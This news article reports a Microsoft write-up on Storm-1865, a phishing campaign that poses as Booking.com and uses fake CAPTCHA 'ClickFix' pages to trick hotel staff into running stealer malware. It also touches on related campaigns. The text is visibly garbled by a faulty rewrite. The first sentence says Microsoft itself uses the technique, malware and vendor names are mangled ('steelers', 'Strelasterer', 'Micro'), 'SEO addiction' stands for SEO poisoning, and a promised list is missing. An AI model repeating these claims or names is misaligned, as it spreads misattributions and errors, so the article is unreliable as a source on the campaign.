Microsoft is using an increasingly popular social engineering technique called Clickfix to use an increasingly popular social engineering technique that provides malware that earns credentials, to impersonate online travel agency Booking.com, shedding light on an ongoing phishing campaign targeting the hospitality sector.
According to the Tech giant, the activity began in December 2024 and is run with the ultimate goal of carrying out economic fraud and theft. Tracking the campaign under Monica Storm 1865.
“This phishing attack specifically targets individuals from hospitality organizations in North America, Oceania, South, Southeast Asia, and North, Southeast, Eastern and Western Europe. It sends fake emails claiming it will come from agents as it is most likely to work with Booking.com.”
The ClickFix technique involves copying, pasting and launching deceptive instructions that activate the infection process, causing users to run malware by pretending to fix expected (i.e. non-existent) errors. It was first detected in the wild in October 2023.
The attack sequence begins with Storm-1865 sending a malicious email to the target individual and asking for “feedback” about negative reviews left by a guest on Booking.com. The message also includes a link or PDF attachment that contains what appears to direct the recipient to the reservation site.
In reality, however, when you click, the victim leads to a fake Captcha verification page superimposed on “subtle visible background designed to mimic legitimate Booking.com pages.” In doing so, the idea is to provide false sense of security and increase the chances of successful compromise.
“Fake Captcha is where web pages use Clickfix social engineering techniques to download malicious payloads,” Microsoft said. “This technique tells the user to open a Windows Run window using a keyboard shortcut, then launch it by pasting the command that the web page adds to the clipboard.”
The commands use the legitimate MSHTA.EXE binary to form a variety of product malware families, including Xworm, Lumma Stealer, Venomrat, Asyncrat, Danabot, and Netsupport Rat.
Redmond said he previously observed Storm-1865, which targeted buyers using an e-commerce platform, using phishing messages that led to fraudulent payment web pages. Thus, the incorporation of the Clickfix technique illustrates a tactical evolution designed to allow past traditional security measures against phishing and malware.
“The threat actors Microsoft tracks as Storm-1865 will encapsulate clusters of activities running phishing campaigns, leading to payment data theft and fraudulent claims.”
“These campaigns have continued with an increase in volume since at least early 2023, and include messages sent via vendor platforms such as online travel agents and e-commerce platforms, as well as email services such as Gmail and iCloud Mail.”
Storm-1865 is just one of many campaigns that have accepted Clickfix as a vector of malware distribution. This is the effectiveness of this technology, which even Russian and Iranian nation-state groups like APT28 and Muddywater, have adopted it to seduce victims.
“This method in particular utilizes human behavior. By presenting a plausible ‘solution’ to perceived problems, attackers shift the burden of execution towards users, effectively avoiding many automated defenses.”
One such campaign, documented by a Singaporean cybersecurity company, uses Clickfix to drop a downloader named SmokeSaber, serving as a conduit for Lumma Stealer. Other campaigns leverage fraud, SEO addiction, GitHub issues, and spam from forums and social media sites, with links to clickfix pages.
“The Clickfix technique demonstrates the evolution of adversarial social engineering strategies, leveraging user trust and browser capabilities for malware deployment,” Group-IB said. “The rapid adoption of this method by both cybercriminals and APT groups highlights its effectiveness and low technical barriers.”
Some of the other documented ClickFix campaigns are listed below –
Lumma Stealer’s diverse infection mechanisms are further exemplified by the discovery of another campaign that uses fake GitHub repository featuring artificial intelligence (AI) content to deliver steelers through loaders called smart loaders.
“These malicious repositories are disguised as non-malicious tools, such as game cheats, crack software, and cryptocurrency utilities,” Micro said in an analysis published earlier this week. “This campaign invites victims with promises of free or illegal, unauthorized features and encourages them to download ZIP files (e.g. Release.Zip, Software.Zip).”
This operation helps to highlight how threat actors are abused trust related to popular platforms like GitHub for malware propagation.
The findings are rated as operated by a single threat actor called Hive0145, as Trustwave details an email phishing campaign in which it uses invoice-related decoys to distribute an updated version of another steeler malware called Strelasterer.
“The Strelasterers sample includes custom multi-layer obfuscation and a flattened code flow to complicate its analysis,” the company said. “It has been reported that threat actors may develop special cryptors used in “Stellar Loaders,” particularly Strelaster. ”
Source link
